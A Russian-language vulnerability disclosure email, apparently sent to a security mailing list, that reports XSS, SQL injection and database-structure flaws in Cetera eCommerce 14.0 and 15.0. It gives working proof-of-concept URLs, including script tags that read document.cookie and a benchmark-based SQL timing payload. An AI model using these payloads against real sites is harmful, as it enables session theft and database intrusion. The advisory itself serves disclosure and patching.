Здравствуйте 3APA3A!
Сообщаю вам о найденных мною новых Cross-Site Scripting, SQL Injection и SQL DB Structure Extraction уязвимостях в Cetera eCommerce.
XSS (WASC-08) (также работают в версии 15.0):
http://site/catalog/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://site/vendors/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://site/catalog/cart/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://site/news/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
XSS (WASC-08):
http://site/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
Данная уязвимость появилась в версии 15.0. Уязвимость имеет место на странице с 404 ошибкой, поэтому она сработает как по этому адресу,
так и по другим адресам, которые ведут на несуществующие страницы.
SQL Injection (WASC-19):
http://site/catalog/(version()=5.1)/
http://site/catalog/cart/’+benchmark(100000,md5(now()))+’/
SQL DB Structure Extraction (WASC-13):
Уязвимы Cetera eCommerce 14.0 и предыдущие версии, а XSS уязвимости также касаются версии 15.0. Последние четыре уязвимости уже исправлены
в версии Cetera eCommerce 15.0 (которая вышла в октябре 2010 года).
Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/4883/
Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua